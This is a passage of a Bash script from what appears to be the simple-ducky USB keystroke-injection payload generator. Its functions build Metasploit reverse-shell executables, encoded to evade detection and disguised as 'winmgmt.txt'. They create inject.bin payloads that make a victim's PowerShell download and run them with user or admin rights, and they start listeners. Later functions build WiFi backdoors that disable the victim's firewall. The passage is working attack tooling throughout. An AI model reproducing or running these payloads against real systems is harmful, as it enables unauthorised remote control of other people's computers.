| # Powershell Download & Execute (User Priv Shell|Win Vista/7) | |
| ################################################################################# | |
| f_powershellVIS7(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload" | |
| echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide either a Meterpreter or Standard shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with user privileges." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7" | |
| echo -e "\e[1;31mAuthor:\e[0m mubix" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo -e "" | |
| read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype | |
| clear | |
| echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m" | |
| if [ "$payloadtype" == "met" ]; then | |
| msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| else | |
| msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellVIS7.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$payloadtype" == "met" ]; then | |
| x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Powershell Download & Execute w/UAC (Admin Priv Shell|Win Vista/7) | |
| ################################################################################# | |
| f_powershellVIS7admuac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload" | |
| echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide ethier a Meterpreter or Standard Shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with Admin privileges." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit (Props to mubix for designing the orginal PD&E)" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo -e "" | |
| read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype | |
| clear | |
| echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m" | |
| if [ "$payloadtype" == "met" ]; then | |
| msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| else | |
| msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellVIS7admuac.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$payloadtype" == "met" ]; then | |
| x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Powershell Download & Execute w/o UAC (Admin Priv Shell|Win Vista/7) | |
| ################################################################################# | |
| f_powershellVIS7admnouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload" | |
| echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide ethier a Meterpreter or Standard Shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with Admin privileges." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit (Props to mubix for designing the orginal PD&E)" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo -e "" | |
| read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype | |
| clear | |
| echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m" | |
| if [ "$payloadtype" == "met" ]; then | |
| msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| else | |
| msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellVIS7admnouac.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$payloadtype" == "met" ]; then | |
| x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Powershell Download & Execute (User Priv Shell|Win 8) | |
| ################################################################################# | |
| f_powershellWIN8(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload" | |
| echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide either a Meterpreter or Standard shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with user privileges." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8" | |
| echo -e "\e[1;31mAuthor:\e[0m mubix" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo -e "" | |
| read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype | |
| clear | |
| echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m" | |
| if [ "$payloadtype" == "met" ]; then | |
| msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| else | |
| msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellWIN8.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$payloadtype" == "met" ]; then | |
| x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Powershell Download & Execute w/UAC (Admin Priv Shell|Win 8) | |
| ################################################################################# | |
| f_powershellWIN8admuac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload" | |
| echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide ethier a Meterpreter or Standard Shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with Admin privileges." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit (Props to mubix for designing the orginal PD&E)" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo -e "" | |
| read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype | |
| clear | |
| echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m" | |
| if [ "$payloadtype" == "met" ]; then | |
| msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| else | |
| msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellWIN8admuac.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$payloadtype" == "met" ]; then | |
| x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Powershell Download & Execute w/o UAC (Admin Priv Shell|Win 8) | |
| ################################################################################# | |
| f_powershellWIN8admnouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload" | |
| echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide ethier a Meterpreter or Standard Shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with Admin privileges." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit (Props to mubix for designing the orginal PD&E)" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo -e "" | |
| read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype | |
| clear | |
| echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m" | |
| if [ "$payloadtype" == "met" ]; then | |
| msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| else | |
| msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellWIN8admnouac.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$payloadtype" == "met" ]; then | |
| x-terminal-emulator -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| ################################################################################# | |
| # | |
| # Wifi Attacks | |
| # | |
| ################################################################################# | |
| ################################################################################# | |
| ################################################################################# | |
| # WiFi Backdoor w/UAC (Win Vista/7) | |
| ################################################################################# | |
| f_wifibackdoorVIS7uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload opens an Administrative cmd.exe session, then creates a wireless access point and disables the firewall" | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen" | |
| echo "" | |
| echo "" | |
| echo -e "" | |
| read -p "What would you like the SSID to be? " attackerssid | |
| echo "" | |
| read -p "What would you like the AP's key to be? " attackerkey | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard languagee\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/wifibackdoorVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Backdoor w/o UAC (Win Vista/7) | |
| ################################################################################# | |
| f_wifibackdoorVIS7nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload opens an Administrative cmd.exe session, then creates a wireless access point and disables the firewall" | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen" | |
| echo "" | |
| echo "" | |
| echo -e "" | |
| read -p "What would you like the SSID to be? " attackerssid | |
| echo "" | |
| read -p "What would you like the AP's key to be? " attackerkey | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard languagee\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/wifibackdoorVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
